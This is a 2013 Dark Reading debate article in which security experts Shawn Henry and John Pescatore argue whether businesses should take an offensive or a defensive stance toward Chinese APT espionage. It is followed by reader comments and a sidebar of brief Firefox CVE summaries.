Attacks/Breaches
3/11/2013
03:07 PM
Connect Directly
RSS
E-Mail
50%
50%

China Hack Attacks: Play Offense Or Defense?

The Chinese government has been blamed for launching cyber-espionage APT attacks against U.S. businesses. In this debate, two security experts examine how business should respond.

How should U.S. businesses respond to allegations that the Chinese government has been waging cyber espionage using advanced persistent threat (APT) attacks since at least 2006?

Security firm Mandiant recently threw down the gauntlet about these types of attacks, tracing exploits of 141 businesses -- across 20 industries -- to a single group based in China, which it dubbed "APT1."

The existence of such groups isn't in dispute. Indeed, China-based APT gangs appear to have been operating for at least the past six years. Such groups often use spear-phishing emails and attractive-looking but malicious attachments to compromise targeted systems and install a remote-access Trojan (RAT). Attackers then gain a back door onto the targeted network, giving them a jumping-off point for further attacks and reconnaissance, including against a company's business partners.

What is in dispute, however, is how businesses should respond. One school of thought is that they should take a more offensive posture, and gather actionable intelligence for government agencies to carry forward.

Another camp, however, argues that businesses' time and energy would be better spent shoring up defenses and patching known vulnerabilities, to minimize the fallout of the next, inevitable data breach.

In our debate, Shawn Henry, president of CrowdStrike Services, calls for identifying your adversaries and providing this information to law enforcement agencies. John Pescatore, director of emerging security trends at the SANS Institute, says the attacks should drive businesses to focus on their defenses.

What's your view? Use the commenting tool below the article to challenge these experts and share your opinion.

Play Offense

Shawn Henry
Shawn Henry
President, CrowdStrike Services

We have spoken of the cyber threat for far too long. Foreign adversaries have targeted every major organization in this country, and have stolen untold billions of dollars of intellectual property, research and development and corporate strategies and secrets. The volume and sophistication of cyber espionage has increased dramatically during the past five years, and it will grow, unabated, because the financial reward is incalculably high and the risk of negative consequences is almost non-existent.

Our mistake is that we are using the same approach against targeted attack actors, who actually have specific targets in mind and are not going to stop until they have reached their goal. They are relentless. It's not enough to stop their attacks once or twice; they will keep trying until they get in. The problem with existing technologies and defensive tactics is they are too focused on adversary tools (malware and exploits) and not on who the adversary is and how they operate.

This requires us to stop relying solely on "defense." The current cybersecurity approach is "vulnerability reduction," and it has largely failed for the past 20 years. We focus on hardening our networks by "defense-in-depth," using firewalls, anti-virus software, patching vulnerabilities and employing intrusion prevention systems. This approach generally stops those opportunistic actors willing to rob "any data," but the sophisticated, targeted adversary practices crafty offense, and the offense outpaces the defense. While we certainly need to continue with robust defense, we cannot let our guard down. We need to be more proactive and strategic in our approach to the adversary.

Employing a threat mitigation strategy requires an increased ability to detect and identify our adversaries, and to penalize them. This is the identical strategy we employ in the physical world every single day to thwart criminals, spies, and terrorists. They don't refrain from stealing and killing because we're too secure -- hardly! We walk down the street everyday, play in parks, shop in malls and live in houses with glass windows. We're safer, physically, because law enforcement, the intelligence community and the Department of Defense constantly identifies, mitigates, disrupts, arrests and deters the adversary.

In the cyber environment, we must assume adversaries are already inside the perimeter, and we must constantly hunt them on our networks to identify and mitigate their actions. We cannot stand by and wait for them to trip an alarm as they shake the proverbial fence, because sophisticated adversaries jump over the fence, bypassing the intrusion detection "alarm" entirely. Hunting necessitates us acquiring a better site picture of the adversaries…what assets are they targeting, what techniques are they employing, why are they here and who, exactly, are they? This is where intelligence sharing is critical. Companies can use advanced analytical technology to share actionable intelligence, enabling them to correlate data, learn the human aspects of the attack, become more predictive and identify them early enough in the attack cycle to prevent serious consequences.

By no means do I advocate vigilantism, or "hacking back." While I think companies can employ certain "active defense" strategies on their networks to make things much more difficult for the adversary, such as denial and deception campaigns designed to fool them, the primary mitigation role rests with the federal government.

Success in the cyber environment will require unprecedented coordination between private industry -- which as a whole has the ownership and ability to achieve these goals -- and governments, which are primarily authorized to investigate and penalize.

Inevitably we must bring the private sector and the government together to achieve the goal of threat deterrence. The vast majority of the intelligence that will lead to identification of the adversaries resides on private sector networks; they are, in essence, "crime scenes," and the evidence and artifacts of the breach are resident on those networks. That threat intelligence, too, can't be shared periodically via e-mail at human-speed; it needs to be shared among all victims, in real-time, at network speed. The private sector, then, can fill tactical gaps to which the government is blind. This can be done while respecting privacy, a critical and absolutely necessary element of intelligence sharing.

When the adversary is identified, the government can use its resources and actions -- law enforcement, civil, diplomatic, financial, or otherwise -- to mitigate the threat posed by these sophisticated opponents. The consistent threat posed by adversaries will subside only when the cost to operate outweighs any potential gain.

We face significant challenges in our efforts to combat the cyber threat. We must start by opening the debate on the limitations of the existing defensive-only security model and the necessity for a threat deterrence model.

I am optimistic that by strengthening partnerships, effectively sharing actionable intelligence, and successfully identifying our adversaries, with continued defensive measures, we can best protect commercial and critical infrastructure from grave damage. By jointly working together to achieve a safer cyber environment, we can shine a light on our adversaries and stop them in their tracks, instead of constantly telling victims to "just do more."

Shawn Henry is the president of CrowdStrike Services, a security technology firm focused on helping enterprises protect their most sensitive information. He retired from the FBI in 2012 as Executive Assistant Director, where he had responsibility for, among other things, FBI cyber strategy and operations worldwide.

Play Defense

John Pescatore
John Pescatore
Director, Emerging Security Trends, SANS

Consider this common scenario: your CFO clicks on a phishing email. Her PC, lacking numerous patches, gets compromised and the attacker takes advantage of the CFO's over-privileged account to log into the engineering database and steal the crown jewels of your corporate intellectual property. Six weeks later, when the compromise is finally discovered, your CEO is stomping towards you, and the InfoSec magical genie appears before you and says: "I have a way back machine and will send you back in time to the day before the compromise. You can have one new piece of knowledge to prevent the attack. What do you choose?"

Whether the attack came from a PLA commander in Beijing, a hacktivist in Helsinki or a clever teenager in Toledo shouldn't even make the top 5 things you would wish to know beforehand -- it is the attack and the vulnerabilities exploited that matter, not who launched the attack.

You see, there is a major difference between physical attacks and cyber attacks. In physical attacks, size matters. No bank can protect itself against a tank or a jet aircraft. However, that is not the case in the cyber world. That scenario above has been launched for years by cybercriminals, hacktivists and vandals -- and in recent years received a lot of press because governments are now doing so, as well. Every one of those attacks exploits the same vulnerabilities or deficiencies in critical security controls. Fix those and it doesn't matter who launched the attack. The attack is prevented, avoided or mitigated.

Have you noticed that in this wave of press about advanced targeted attacks some companies have admitted having their entire business compromised, while others have said the first stage got in but the attack failed, and still others have not had to say anything? The companies that pay attention to the blocking and tackling of minimizing vulnerabilities, shielding the unavoidable and leaning forward to detect unusual events not only stay more secure, but also usually end up spending a smaller percentage of revenue to achieve a higher level of security -- without needing to know who actually launched those attacks.

There is also a major difference between what business can and should do about attacks, and what law enforcement and governments should do. Banks don't chase bank robbers. Police departments don't prevent retail shrinkage (shoplifting and employee theft). Defense contractors don't create phony factories to keep industrial spies busy. Fighting back against attackers may sound good but it never, ever makes good business sense.

The best business strategy is the security program that avoids vulnerabilities and risks wherever possible, and minimizes the damage of the inevitable successful attack. Entering into active defense-fueled mutually assured destruction scenarios may have merits at the national defense level but never makes sense at the business level.

Look, it isn't glamorous but the best information security programs are just like the best offensive lines in football. They are the most successful when no one hears about them at all. To keep the quarterback from being sacked, they don't need to know the names of the blitzing linebackers -- they need to know what tactics the attackers use, they need to plug the gaps and they need to jump on the ball when the "skill positions" fumble.

Governments should focus on national security issues, law enforcement on chasing and punishing criminals and businesses should focus on protecting their customers' data and their stakeholders' interests. Mixing those up inevitably ends up with the quarterback sacked and the other team running away with the game.

John Pescatore joined SANS in January 2013 after more than 13 years as Gartner's lead security analyst. Prior to Gartner he ran consulting groups at Trusted Information Systems and Entrust in the firewall and PKI areas and spent 11 years building secure systems for GTE. He began his career at the National Security Agency followed by the U.S. Secret Service.

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Page 1 / 2   >   >>
Mark Sitkowski
50%
50%
Mark Sitkowski,
User Rank: Apprentice
3/14/2013 | 11:51:51 PM
re: China Hack Attacks: Play Offense Or Defense?
In theory, such enforcement is provided by the CERT organisations in each country. In practice, the cooperation you get from them varies enormously.
I know precisely where the C&C for this botnet is, - hiding behind 200 dynamically allocated IP addresses in Turkey - but I can't get any cooperation from the Turkish Telecom company, or a reply from the CERT office.
Even if there were a private cyber hit team, they couldn't trace dynamic IP addresses from the outside, so there is no offensive action that can be taken.
Jonathan_Camhi
50%
50%
Jonathan_Camhi,
User Rank: Apprentice
3/14/2013 | 8:20:44 PM
re: China Hack Attacks: Play Offense Or Defense?
I'm not sure if it should be left up to each business to decide on its own how to deal with the situation. Any cyber security legislation coming from Washington should seek to address when and how companies should counter attacks from hackers, and if any offense should be left to the national security experts. Would be helpful to have some clearly defined roles to get everyone on the same page working against the current threats that are out there.
Tonyvo
50%
50%
Tonyvo,
User Rank: Apprentice
3/14/2013 | 4:42:57 PM
re: China Hack Attacks: Play Offense Or Defense?
Espionage is an older human profession and pasttime than prostitution. In fact, the Garden of Eden story is about a God spying on an Adam and Eve as they tried to hack the Tree of Knowledge!
And so, the distinction between offense and defense in this "game of life" is as relative and moot as the illusory distinction between good and evil itself. It all depends on viewpoint of the side you are presently playing for.
The simple premise is that if you have something worth protecting, you will have to protect it. And if you hire a CFO or a Guardian Angel that is stupid enough to follow a phishing link in an email, then you probably aren't very good at protection and you deserve to get hacked.
Sacalpha1
50%
50%
Sacalpha1,
User Rank: Apprentice
3/14/2013 | 4:38:51 AM
re: China Hack Attacks: Play Offense Or Defense?
I don't think it's one or the other. It's both at the same time. You should absolutely have the lasted patches, virus definitions, firewall defenses, etc. in place. That is a fundamental part of IT's job in any company. But there needs to be a much better offensive component as well. If there is no penalty for the attacker other than they just didn't get any data (because of good defenses), there is no deterrent for future attempts. We need specialized law enforcement groups that actively counter hack threats. I also like the idea in another comment of licensed privateers that are hired to go after specific targets.
Destroying Angel
50%
50%
Destroying Angel,
User Rank: Apprentice
3/13/2013 | 6:45:59 PM
re: China Hack Attacks: Play Offense Or Defense?
Shawn Henry is PART of the way there. The rest of the way involves congressionally bonded and licensed cyber privateers. The deterrence factor would cover not only cyberthieves but rogue governments as well. You want absolute proof that deterrence works? Notice how those zany pranksters at Anonymous backed down from attacking drug cartels. Maybe something about seeing body parts (theirs, their families', and their friends') scattered in public places made them reconsider.
philburton
50%
50%
philburton,
User Rank: Apprentice
3/13/2013 | 6:37:50 PM
re: China Hack Attacks: Play Offense Or Defense?
Why not direct these comments to the Republicans and the Chamber of Commerce, who opposed a bill in Congress that would have promoted a government/private sector partnership in this area.
beachman14
50%
50%
beachman14,
User Rank: Apprentice
3/13/2013 | 12:46:22 PM
re: China Hack Attacks: Play Offense Or Defense?
Stealing is stealing, stolen assets should be retrieved, and thieves should be punished. If you have valuable physical assets to protect, you place them in a secure location and lock the doors. And if a thief breaks in and steals them, you catch the thief, retrieve the stolen assets, and administer justice. How is this so different? Of course you have to have good defense, but the thieves have broken in and stolen valuable assets. How about we retrieve the value of that which was stolen by our government not repaying loans from the offenders? How about we administer justice by having ICANN remove the offenders connectivity from the Internet altogether for some period of time? The thieves have been identified, so let's recover the value of what was stolen and punish the thieves.
Andrew Hornback
50%
50%
Andrew Hornback,
User Rank: Apprentice
3/13/2013 | 4:06:10 AM
re: China Hack Attacks: Play Offense Or Defense?
As much as I'd like to say that I agree with playing offense here, you can't play offense until you've got a strong defense. It's an absolute must to keep everything as current as possible - OS patches, application patches, security appliance firmware, and user knowledge.

All of the latest and greatest security technology in the world can be defeated if the "man in the loop" fails to act in a secure manner. As long as users are involved, there is a risk of failure, period.

If you assume that the enemy is within your perimeter already, do you block ingress or egress? How do you determine if the enemy is there - given sufficient time and sophistcated attacks, can you depend on any system you have detecting that they're there? At that point, do you shut everything down and do a full security sweep? Hardly - business has to keep running, especially when a global economy dictates it.

From the play offense point of view, your INFOSEC folks are always going to be seen as playing catch-up and while that may be true in some instances... I think that from a management point of view, you're adding more stress to a group that's usually quite well enough stressed as it is.

Andrew Hornback
InformationWeek Contributor
Drew Conry-Murray
50%
50%
Drew Conry-Murray,
User Rank: Ninja
3/13/2013 | 12:02:55 AM
re: China Hack Attacks: Play Offense Or Defense?
I agree with Shawn Henry that the private sector can do more to share actionable security information within appropriate verticals, but it also seems like both sides are arguing, correctly, that businesses should focus on creating a robust set of defenses, and let law enforcement and government agencies handle prosecution or retaliation.

Drew Conry-Murray
Editor, Network Computing
Mark Sitkowski
50%
50%
Mark Sitkowski,
User Rank: Apprentice
3/12/2013 | 11:16:47 PM
re: China Hack Attacks: Play Offense Or Defense?
Unlike other readers, I can speak with a bit more insight, since we've been under a cyber attack since last December.
I agree with John, in that your system should be as near hack-proof as you can make it. To date, not a single attack vector has succeeded, so we must have done something right.
We minimise the impact on ourselves, by getting our IDS to immediately generate a new firewall rule, for every identified hack attempt. It also generates an email to the ISP, identifying the IP address of the attacking zombie, and a clue as to where to find the malware (eggdrop bot/psybnc).
Our offence strategy, if you can call it that, is in the form of an abuse file, sent back by apache, containing 1500 lines of 'Attempted Abuse' messages which, at least, delay the next line of the hack script, long enough for the firewall to be in a position to stop it. For good measure, the last line of the abuse file is a series of ANSI escape codes, designed to screw up any ANSI terminal running a script.
Having had little joy from communicating with CERT, in the 51 countries from which attacks are emanating, we recently contacted SANS and, at least, get the impression that they know what they're doing.
Page 1 / 2   >   >>
Register for Dark Reading Newsletters
White Papers
Flash Poll
Current Issue
Cartoon
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-1544
Published: 2014-07-23
Use-after-free vulnerability in the CERT_DestroyCertificate function in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7, allows remote attackers to execute arbitrary code via vectors that trigger cer...

CVE-2014-1547
Published: 2014-07-23
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1548
Published: 2014-07-23
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 31.0 and Thunderbird before 31.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1549
Published: 2014-07-23
The mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer function in Mozilla Firefox before 31.0 and Thunderbird before 31.0 does not properly allocate Web Audio buffer memory, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and applica...

CVE-2014-1550
Published: 2014-07-23
Use-after-free vulnerability in the MediaInputPort class in Mozilla Firefox before 31.0 and Thunderbird before 31.0 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) by leveraging incorrect Web Audio control-message ordering.

Best of the Web
Dark Reading Radio
Archived Dark Reading Radio
Sara Peters hosts a conversation on Botnets and those who fight them.